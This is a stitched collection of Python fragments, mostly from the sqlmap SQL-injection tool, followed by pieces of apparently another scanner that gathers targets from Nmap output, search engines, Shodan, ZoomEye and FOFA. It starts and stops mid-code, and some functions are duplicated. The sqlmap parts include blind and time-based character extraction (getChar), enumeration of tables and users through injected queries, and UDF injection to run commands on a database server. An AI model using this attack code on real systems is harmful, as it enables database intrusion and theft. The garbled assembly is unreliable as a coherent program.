"module 'sqlite3' has no attribute 'OperationalError'")): errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("SyntaxError: Non-ASCII character", ".py on line", "but no encoding declared")): errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "_'")): errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "sqlmap.conf", "Test")): errMsg = "you are trying to run (hidden) development tests inside the production environment" logger.critical(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("HTTPNtlmAuthHandler", "'str' object has no attribute 'decode'")): errMsg = "package 'python-ntlm' has a known compatibility issue with the " errMsg += "Python 3 (Reference: 'https://github.com/mullender/python-ntlm/pull/61')" logger.critical(errMsg) raise SystemExit elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): errMsg = "there has been a problem in enumeration. " errMsg += "Because of a considerable chance of false-positive case " errMsg += "you are advised to rerun with switch '--flush-session'" logger.critical(errMsg) raise SystemExit elif "AttributeError: 'module' object has no attribute 'F_GETFD'" in excMsg: errMsg = "invalid runtime (\"%s\") " % excMsg.split("Error: ")[-1].strip() errMsg += "(Reference: 'https://stackoverflow.com/a/38841364' & 'https://bugs.python.org/issue24944#msg249231')" logger.critical(errMsg) raise SystemExit elif "bad marshal data (unknown type code)" in excMsg: match = re.search(r"\s*(.+)\s+ValueError", excMsg) errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") errMsg += ". Please delete .pyc files on your system to fix the problem" logger.critical(errMsg) raise SystemExit for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) try: file_ = os.path.relpath(file_, os.path.dirname(__file__)) except ValueError: pass file_ = file_.replace("\\", '/') if "../" in file_: file_ = re.sub(r"(\.\./)+", '/', file_) else: file_ = file_.lstrip('/') file_ = re.sub(r"/{2,}", '/', file_) excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) excMsg = maskSensitiveData(excMsg) if conf.get("api") or not valid: logger.critical("%s\n%s" % (errMsg, excMsg)) else: logger.critical(errMsg) dataToStdout("%s\n" % setColor(excMsg.strip(), level=logging.CRITICAL)) createGithubIssue(errMsg, excMsg) finally: kb.threadContinue = False if getDaysFromLastUpdate() > LAST_UPDATE_NAGGING_DAYS: warnMsg = "your sqlmap version is outdated" logger.warn(warnMsg) if conf.get("showTime"): dataToStdout("\n[*] ending @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) kb.threadException = True if kb.get("tempDir"): for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)): try: os.remove(filepath) except OSError: pass if not filterNone(filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in (".lock", ".exe", ".so", '_'))): # ignore junk files try: shutil.rmtree(kb.tempDir, ignore_errors=True) except OSError: pass if conf.get("hashDB"): conf.hashDB.flush(True) conf.hashDB.close() # NOTE: because of PyPy if conf.get("harFile"): try: with openFile(conf.harFile, "w+b") as f: json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) except SqlmapBaseException as ex: errMsg = getSafeExString(ex) logger.critical(errMsg) if conf.get("api"): conf.databaseCursor.disconnect() if conf.get("dumper"): conf.dumper.flush() # short delay for thread finalization _ = time.time() while threading.active_count() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: time.sleep(0.01) if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() conf.clear() kb.clear() conf.disableBanner = True main()
def getTables(self, bruteForce=None): if len(kb.data.cachedTables) > 0: return kb.data.cachedTables self.forceDbmsEnum() if bruteForce is None: if Backend.isDbms( DBMS.MYSQL) and not kb.data.has_information_schema: errMsg = "information_schema not available, " errMsg += "back-end DBMS is MySQL < 5.0" logger.error(errMsg) bruteForce = True elif Backend.isDbms(DBMS.ACCESS): try: tables = self.getTables(False) except SqlmapNoneDataException: tables = None if not tables: errMsg = "cannot retrieve table names, " errMsg += "back-end DBMS is Access" logger.error(errMsg) bruteForce = True else: return tables if conf.db == CURRENT_DB: conf.db = self.getCurrentDb() if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.db = conf.db.upper() if conf.db: dbs = conf.db.split(',') else: dbs = self.getDbs() dbs = [_ for _ in dbs if _ and _.strip()] for db in dbs: dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) if bruteForce: resumeAvailable = False for db, table in kb.brute.tables: if db == conf.db: resumeAvailable = True break if resumeAvailable and not conf.freshQueries: for db, table in kb.brute.tables: if db == conf.db: if conf.db not in kb.data.cachedTables: kb.data.cachedTables[conf.db] = [table] else: kb.data.cachedTables[conf.db].append(table) return kb.data.cachedTables message = "do you want to use common table existence check? %s " % ( "[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, ) else "[y/N/q]") choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() if choice == 'N': return elif choice == 'Q': raise SqlmapUserQuitException else: return tableExists(paths.COMMON_TABLES) infoMsg = "fetching tables for database" infoMsg += "%s: '%s'" % ("s" if len(dbs) > 1 else "", ", ".join( unsafeSQLIdentificatorNaming(unArrayizeValue(db)) for db in sorted(dbs))) logger.info(infoMsg) rootQuery = queries[Backend.getIdentifiedDbms()].tables if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: query = rootQuery.inband.query condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None if condition: if not Backend.isDbms(DBMS.SQLITE): query += " WHERE %s" % condition if conf.excludeSysDbs: infoMsg = "skipping system database%s '%s'" % ( "s" if len(self.excludeDbsList) > 1 else "", ", ".join( unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) logger.info(infoMsg) query += " IN (%s)" % ','.join( "'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) else: query += " IN (%s)" % ','.join( "'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) if len(dbs) < 2 and ("%s," % condition) in query: query = query.replace("%s," % condition, "", 1) values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): values = filter(None, arrayizeValue(values)) if len(values) > 0 and not isListLike(values[0]): values = [(dbs[0], _) for _ in values] for db, table in filterPairValues(values): db = safeSQLIdentificatorNaming(db) table = safeSQLIdentificatorNaming(unArrayizeValue(table), True) if db not in kb.data.cachedTables: kb.data.cachedTables[db] = [table] else: kb.data.cachedTables[db].append(table) if not kb.data.cachedTables and isInferenceAvailable( ) and not conf.direct: for db in dbs: if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % unsafeSQLIdentificatorNaming( db) logger.info(infoMsg) continue infoMsg = "fetching number of tables for " infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS): query = rootQuery.blind.count else: query = rootQuery.blind.count % unsafeSQLIdentificatorNaming( db) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if count == 0: warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming( db) warnMsg += "appears to be empty" logger.warn(warnMsg) continue elif not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of " warnMsg += "tables for database '%s'" % unsafeSQLIdentificatorNaming( db) logger.warn(warnMsg) continue tables = [] plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.isDbms(DBMS.SYBASE): query = rootQuery.blind.query % (db, ( kb.data.cachedTables[-1] if kb.data.cachedTables else " ")) elif Backend.getIdentifiedDbms() in (DBMS.MAXDB, DBMS.ACCESS): query = rootQuery.blind.query % ( kb.data.cachedTables[-1] if kb.data.cachedTables else " ") elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): query = rootQuery.blind.query % index elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX): query = rootQuery.blind.query % ( index, unsafeSQLIdentificatorNaming(db)) else: query = rootQuery.blind.query % ( unsafeSQLIdentificatorNaming(db), index) table = unArrayizeValue( inject.getValue(query, union=False, error=False)) if not isNoneValue(table): kb.hintValue = table table = safeSQLIdentificatorNaming(table, True) tables.append(table) if tables: kb.data.cachedTables[db] = tables else: warnMsg = "unable to retrieve the table names " warnMsg += "for database '%s'" % unsafeSQLIdentificatorNaming( db) logger.warn(warnMsg) if isNoneValue(kb.data.cachedTables): kb.data.cachedTables.clear() if not kb.data.cachedTables: errMsg = "unable to retrieve the table names for any database" if bruteForce is None: logger.error(errMsg) return self.getTables(bruteForce=True) elif not conf.search: raise SqlmapNoneDataException(errMsg) else: for db, tables in kb.data.cachedTables.items(): kb.data.cachedTables[db] = sorted(tables) if tables else tables if kb.data.cachedTables: for db in kb.data.cachedTables.keys(): kb.data.cachedTables[db] = list(set(kb.data.cachedTables[db])) return kb.data.cachedTables
else: # Run doc tests # Reference: http://docs.python.org/library/doctest.html (failure_count, test_count) = doctest.testmod(module) if failure_count > 0: retVal = False count += 1 status = '%d/%d (%d%s) ' % (count, length, round(100.0*count/length), '%') dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") else: logger.error("smoke test final result: FAILED") return retVal def adjustValueType(tagName, value): for family in optDict.keys(): for name, type_ in optDict[family].items(): if type(type_) == tuple: type_ = type_[0] if tagName == name: if type_ == "boolean": value = (value == "True") elif type_ == "integer": value = int(value) elif type_ == "float": value = float(value)
def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): """ continuousOrder means that distance between each two neighbour's numerical values is exactly 1 """ result = tryHint(idx) if result: return result if charTbl is None: charTbl = type(asciiTbl)(asciiTbl) originalTbl = type(charTbl)(charTbl) if continuousOrder and shiftTable is None: # Used for gradual expanding into unicode charspace shiftTable = [2, 2, 3, 3, 5, 4] if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl: charTbl.remove(ord('\n')) if not charTbl: return None elif len(charTbl) == 1: forgedPayload = safeStringFormat( payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0])) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return decodeIntToUnicode(charTbl[0]) else: return None maxChar = maxValue = charTbl[-1] minChar = minValue = charTbl[0] while len(charTbl) != 1: position = (len(charTbl) >> 1) posValue = charTbl[position] if "'%s'" % CHAR_INFERENCE_MARK not in payload: forgedPayload = safeStringFormat( payload, (expressionUnescaped, idx, posValue)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape( "'%s'" % decodeIntToUnicode(posValue)) forgedPayload = safeStringFormat( payload, (expressionUnescaped, idx)).replace( markingValue, unescapedCharValue) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: minValue = posValue if type(charTbl) != xrange: charTbl = charTbl[position:] else: # xrange() - extended virtual charset used for memory/space optimization charTbl = xrange(charTbl[position], charTbl[-1] + 1) else: maxValue = posValue if type(charTbl) != xrange: charTbl = charTbl[:position] else: charTbl = xrange(charTbl[0], charTbl[position]) if len(charTbl) == 1: if continuousOrder: if maxValue == 1: return None # Going beyond the original charset elif minValue == maxChar: # If the original charTbl was [0,..,127] new one # will be [128,..,(128 << 4) - 1] or from 128 to 2047 # and instead of making a HUGE list with all the # elements we use a xrange, which is a virtual # list if expand and shiftTable: charTbl = xrange( maxChar + 1, (maxChar + 1) << shiftTable.pop()) originalTbl = xrange(charTbl) maxChar = maxValue = charTbl[-1] minChar = minValue = charTbl[0] else: return None else: retVal = minValue + 1 if retVal in originalTbl or ( retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): if timeBasedCompare and not validateChar( idx, retVal): if not kb.originalTimeDelay: kb.originalTimeDelay = conf.timeSec kb.timeValidCharsRun = 0 if retried < MAX_TIME_REVALIDATION_STEPS: errMsg = "invalid character detected. retrying.." logger.error(errMsg) if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: conf.timeSec += 1 warnMsg = "increasing time delay to %d second%s " % ( conf.timeSec, 's' if conf.timeSec > 1 else '') logger.warn(warnMsg) if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: dbgMsg = "turning off time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1) else: errMsg = "unable to properly validate last character value ('%s').." % decodeIntToUnicode( retVal) logger.error(errMsg) conf.timeSec = kb.originalTimeDelay return decodeIntToUnicode(retVal) else: if timeBasedCompare: kb.timeValidCharsRun += 1 if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD: dbgMsg = "turning back on time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES return decodeIntToUnicode(retVal) else: return None else: if minValue == maxChar or maxValue == minChar: return None for index in xrange(len(originalTbl)): if originalTbl[index] == minValue: break # If we are working with non-continuous elements, both minValue and character after # are possible candidates for retVal in (originalTbl[index], originalTbl[index + 1]): forgedPayload = safeStringFormat( payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal)) result = Request.queryPage( forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return decodeIntToUnicode(retVal) return None
def main(): """ Main function of sqlmap when running from command line. """ try: checkEnvironment() setPaths(modulePath()) banner() # Store original command line options for possible later restoration cmdLineOptions.update(cmdLineParser().__dict__) initOptions(cmdLineOptions) if conf.get("api"): # heavy imports from lib.utils.api import StdDbOut from lib.utils.api import setRestAPILog # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) init() if not conf.updateAll: # Postponed imports (faster start) if conf.profile: from lib.core.profiling import profile profile() elif conf.smokeTest: from lib.core.testing import smokeTest smokeTest() elif conf.liveTest: from lib.core.testing import liveTest liveTest() else: from lib.controller.controller import start try: start() except thread.error as ex: if "can't start new thread" in getSafeExString(ex): errMsg = "unable to start new threads. Please check OS (u)limits" logger.critical(errMsg) raise SystemExit else: raise except SqlmapUserQuitException: errMsg = "user quit" try: logger.error(errMsg) except KeyboardInterrupt: pass except (SqlmapSilentQuitException, bdb.BdbQuit): pass except SqlmapShellQuitException: cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: errMsg = getSafeExString(ex) try: logger.critical(errMsg) except KeyboardInterrupt: pass raise SystemExit except KeyboardInterrupt: print errMsg = "user aborted" try: logger.error(errMsg) except KeyboardInterrupt: pass except EOFError: print errMsg = "exit" try: logger.error(errMsg) except KeyboardInterrupt: pass except SystemExit: pass except: print errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() valid = checkIntegrity() try: if valid is False: errMsg = "code integrity check failed (turning off automatic issue creation). " errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) print dataToStdout(excMsg) raise SystemExit elif any(_ in excMsg for _ in ("tamper/", "waf/")): logger.critical(errMsg) print dataToStdout(excMsg) raise SystemExit elif "MemoryError" in excMsg: errMsg = "memory exhaustion detected" logger.error(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): errMsg = "no space left on output device" logger.error(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")): errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.error(errMsg) raise SystemExit elif "Read-only file system" in excMsg: errMsg = "output device is mounted as read-only" logger.error(errMsg) raise SystemExit elif "OperationalError: disk I/O error" in excMsg: errMsg = "I/O error on output device" logger.error(errMsg) raise SystemExit elif "Violation of BIDI" in excMsg: errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" logger.error(errMsg) raise SystemExit elif "_mkstemp_inner" in excMsg: errMsg = "there has been a problem while accessing temporary files" logger.error(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " errMsg += "(Reference: https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe)" logger.error(errMsg) raise SystemExit elif "must be pinned buffer, not bytearray" in excMsg: errMsg = "error occurred at Python interpreter which " errMsg += "is fixed in 2.7.x. Please update accordingly " errMsg += "(Reference: https://bugs.python.org/issue8104)" logger.error(errMsg) raise SystemExit elif "can't start new thread" in excMsg: errMsg = "there has been a problem while creating new thread instance. " errMsg += "Please make sure that you are not running too many processes" if not IS_WIN: errMsg += " (or increase the 'ulimit -u' value)" logger.error(errMsg) raise SystemExit elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")): errMsg = "there has been a problem in enumeration. " errMsg += "Because of a considerable chance of false-positive case " errMsg += "you are advised to rerun with switch '--flush-session'" logger.error(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("pymysql", "configparser")): errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" logger.error(errMsg) raise SystemExit elif "bad marshal data (unknown type code)" in excMsg: match = re.search(r"\s*(.+)\s+ValueError", excMsg) errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") errMsg += ". Please delete .pyc files on your system to fix the problem" logger.error(errMsg) raise SystemExit elif "url = url.strip()" in excMsg: dataToStdout(excMsg) print errMsg = "please contact '*****@*****.**' with details for this issue " errMsg += "as he is trying to reproduce it for long time" logger.error(errMsg) raise SystemExit elif kb.get("dumpKeyboardInterrupt"): raise SystemExit elif any(_ in excMsg for _ in ("Broken pipe",)): raise SystemExit for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) file_ = os.path.relpath(file_, os.path.dirname(__file__)) file_ = file_.replace("\\", '/') file_ = re.sub(r"\.\./", '/', file_).lstrip('/') excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) excMsg = maskSensitiveData(excMsg) if conf.get("api") or not valid: logger.critical("%s\n%s" % (errMsg, excMsg)) else: logger.critical(errMsg) kb.stickyLevel = logging.CRITICAL dataToStdout(excMsg) createGithubIssue(errMsg, excMsg) except KeyboardInterrupt: pass finally: kb.threadContinue = False if conf.get("showTime"): dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) kb.threadException = True if kb.get("tempDir"): for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)): try: os.remove(filepath) except OSError: pass if not filter(None, (filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in ('.lock', '.exe', '_')))): shutil.rmtree(kb.tempDir, ignore_errors=True) if conf.get("hashDB"): try: conf.hashDB.flush(True) except KeyboardInterrupt: pass if conf.get("harFile"): with openFile(conf.harFile, "w+b") as f: json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() conf.clear() kb.clear() main() if conf.get("api"): try: conf.databaseCursor.disconnect() except KeyboardInterrupt: pass if conf.get("dumper"): conf.dumper.flush() # short delay for thread finalization try: _ = time.time() while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: time.sleep(0.01) except KeyboardInterrupt: pass finally: # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program if threading.activeCount() > 1: os._exit(0)
def udfInjectCustom(self): if Backend.getIdentifiedDbms() not in (DBMS.MYSQL, DBMS.PGSQL): errMsg = "UDF injection feature only works on MySQL and PostgreSQL" logger.error(errMsg) return if not isStackingAvailable() and not conf.direct: errMsg = "UDF injection feature requires stacked queries SQL injection" logger.error(errMsg) return self.checkDbmsOs() if not self.isDba(): warnMsg = "functionality requested probably does not work because " warnMsg += "the current session user is not a database administrator" logger.warn(warnMsg) if not conf.shLib: msg = "what is the local path of the shared library? " while True: self.udfLocalFile = readInput(msg) if self.udfLocalFile: break else: logger.warn("you need to specify the local path of the shared library") else: self.udfLocalFile = conf.shLib if not os.path.exists(self.udfLocalFile): errMsg = "the specified shared library file does not exist" raise SqlmapFilePathException(errMsg) if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"): errMsg = "shared library file must end with '.dll' or '.so'" raise SqlmapMissingMandatoryOptionException(errMsg) elif self.udfLocalFile.endswith(".so") and Backend.isOs(OS.WINDOWS): errMsg = "you provided a shared object as shared library, but " errMsg += "the database underlying operating system is Windows" raise SqlmapMissingMandatoryOptionException(errMsg) elif self.udfLocalFile.endswith(".dll") and Backend.isOs(OS.LINUX): errMsg = "you provided a dynamic-link library as shared library, " errMsg += "but the database underlying operating system is Linux" raise SqlmapMissingMandatoryOptionException(errMsg) self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0] self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1] msg = "how many user-defined functions do you want to create " msg += "from the shared library? " while True: udfCount = readInput(msg, default='1') if udfCount.isdigit(): udfCount = int(udfCount) if udfCount <= 0: logger.info("nothing to inject then") return else: break else: logger.warn("invalid value, only digits are allowed") for x in xrange(0, udfCount): while True: msg = "what is the name of the UDF number %d? " % (x + 1) udfName = readInput(msg) if udfName: self.udfs[udfName] = {} break else: logger.warn("you need to specify the name of the UDF") if Backend.isDbms(DBMS.MYSQL): defaultType = "string" elif Backend.isDbms(DBMS.PGSQL): defaultType = "text" self.udfs[udfName]["input"] = [] msg = "how many input parameters takes UDF " msg += "'%s'? (default: 1) " % udfName while True: parCount = readInput(msg, default='1') if parCount.isdigit() and int(parCount) >= 0: parCount = int(parCount) break else: logger.warn("invalid value, only digits >= 0 are allowed") for y in xrange(0, parCount): msg = "what is the data-type of input parameter " msg += "number %d? (default: %s) " % ((y + 1), defaultType) while True: parType = readInput(msg, default=defaultType).strip() if parType.isdigit(): logger.warn("you need to specify the data-type of the parameter") else: self.udfs[udfName]["input"].append(parType) break msg = "what is the data-type of the return " msg += "value? (default: %s) " % defaultType while True: retType = readInput(msg, default=defaultType) if hasattr(retType, "isdigit") and retType.isdigit(): logger.warn("you need to specify the data-type of the return value") else: self.udfs[udfName]["return"] = retType break success = self.udfInjectCore(self.udfs) if success is False: self.cleanup(udfDict=self.udfs) return False msg = "do you want to call your injected user-defined " msg += "functions now? [Y/n/q] " choice = readInput(msg, default='Y').upper() if choice == 'N': self.cleanup(udfDict=self.udfs) return elif choice == 'Q': self.cleanup(udfDict=self.udfs) raise SqlmapUserQuitException while True: udfList = [] msg = "which UDF do you want to call?" for udf in self.udfs.keys(): udfList.append(udf) msg += "\n[%d] %s" % (len(udfList), udf) msg += "\n[q] Quit" while True: choice = readInput(msg).upper() if choice == 'Q': break elif hasattr(choice, "isdigit") and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList): choice = int(choice) break elif isinstance(choice, int) and choice > 0 and choice <= len(udfList): break else: warnMsg = "invalid value, only digits >= 1 and " warnMsg += "<= %d are allowed" % len(udfList) logger.warn(warnMsg) if not isinstance(choice, int): break cmd = "" count = 1 udfToCall = udfList[choice - 1] for inp in self.udfs[udfToCall]["input"]: msg = "what is the value of the parameter number " msg += "%d (data-type: %s)? " % (count, inp) while True: parValue = readInput(msg) if parValue: if "int" not in inp and "bool" not in inp: parValue = "'%s'" % parValue cmd += "%s," % parValue break else: logger.warn("you need to specify the value of the parameter") count += 1 cmd = cmd[:-1] msg = "do you want to retrieve the return value of the " msg += "UDF? [Y/n] " if readInput(msg, default='Y', boolean=True): output = self.udfEvalCmd(cmd, udfName=udfToCall) if output: conf.dumper.string("return value", output) else: dataToStdout("No return value\n") else: self.udfExecCmd(cmd, udfName=udfToCall, silent=True) msg = "do you want to call this or another injected UDF? [Y/n] " if not readInput(msg, default='Y', boolean=True): break self.cleanup(udfDict=self.udfs)
def put_target(self, obj, service=None): self.targets.append([obj, service]) if len(self.targets) > self.target_pool_total: msg = 'Too many targets! Please control the target\'s numbers under the %d.' % self.target_pool_total sys.exit(logger.error(msg))
def getUsers(self): infoMsg = "fetching database users" logger.info(infoMsg) rootQuery = queries[Backend.getIdentifiedDbms()].users condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin( ("2005", "2008"))) condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema) if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if Backend.isFork(FORK.DRIZZLE): query = rootQuery.inband.query3 elif condition: query = rootQuery.inband.query2 else: query = rootQuery.inband.query values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): kb.data.cachedUsers = [] for value in arrayizeValue(values): value = unArrayizeValue(value) if not isNoneValue(value): kb.data.cachedUsers.append(value) if not kb.data.cachedUsers and isInferenceAvailable( ) and not conf.direct: infoMsg = "fetching number of database users" logger.info(infoMsg) if Backend.isFork(FORK.DRIZZLE): query = rootQuery.blind.count3 elif condition: query = rootQuery.blind.count2 else: query = rootQuery.blind.count count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if count == 0: return kb.data.cachedUsers elif not isNumPosStrValue(count): errMsg = "unable to retrieve the number of database users" raise SqlmapNoneDataException(errMsg) plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB): query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ") elif Backend.isFork(FORK.DRIZZLE): query = rootQuery.blind.query3 % index elif condition: query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index user = unArrayizeValue( inject.getValue(query, union=False, error=False)) if user: kb.data.cachedUsers.append(user) if not kb.data.cachedUsers: errMsg = "unable to retrieve the database users" logger.error(errMsg) return kb.data.cachedUsers
def load_targets(self): if 'target_simple' in conf.keys(): self._load_target(conf['target_simple']) logger.sysinfo("Loading target: %s" % (conf['target_simple'])) elif 'target_file' in conf.keys(): for _line in open(conf['target_file'], 'r'): line = _line.strip() if line: self._load_target(line) logger.sysinfo("Loading target: %s" % (conf['target_file'])) elif 'target_nmap_xml' in conf.keys(): import xml.etree.ElementTree as ET tree = ET.parse(conf['target_nmap_xml']) root = tree.getroot() for host in root.findall('host'): host_id = host.find('address').get('addr') # infoLit = [] for port in host.iter('port'): port_id = port.attrib.get('portid') port_protocol = port.attrib.get('protocol') port_state = port.find('state').attrib.get('state') try: port_service = port.find('service').attrib.get('name') except: port_service = "None" # infoDic = {"port": port_id, "status": port_state, "server": port_service, "other": port_protocol} # infoLit.append(infoDic) if port_state.lower() not in ['closed', 'filtered']: self._load_target(host_id + ":" + port_id, port_service) # resDic = {"host": host_id, "info": infoLit} # resLit.append(resDic) logger.sysinfo("Loading target: %s" % (conf['target_nmap_xml'])) elif 'target_network' in conf.keys(): self._load_target(conf['target_network']) logger.sysinfo("Loading target: %s" % (conf['target_network'])) elif 'target_task' in conf.keys(): hashdb = HashDB(os.path.join(paths.DATA_PATH, conf['target_task'])) hashdb.connect() for _row in hashdb.select_all(): if _row[4] != None and _row[4] != '': self._load_target(_row[4]) else: self._load_target(_row[2] + ":" + _row[3]) logger.sysinfo("Loading target: %s" % (conf['target_task'])) elif 'target_search_engine' in conf.keys(): logger.sysinfo("Loading target by baidu/bing/360so: %s" % (conf['target_search_engine'])) urls = search_engine(conf['target_search_engine']) for _url in urls: if _url: self._load_target(_url) elif 'target_zoomeye' in conf.keys(): logger.sysinfo("Loading target by zoomeye: %s" % (conf['target_zoomeye'])) urls = search_api(conf['target_zoomeye']) for _url in urls: if _url: self._load_target(_url) elif 'target_shodan' in conf.keys(): logger.sysinfo("Loading target by shadon: %s" % (conf['target_shodan'])) urls = search_api(conf['target_shodan']) for _url in urls: if _url: self._load_target(_url) elif 'target_fofa' in conf.keys(): logger.sysinfo("Loading 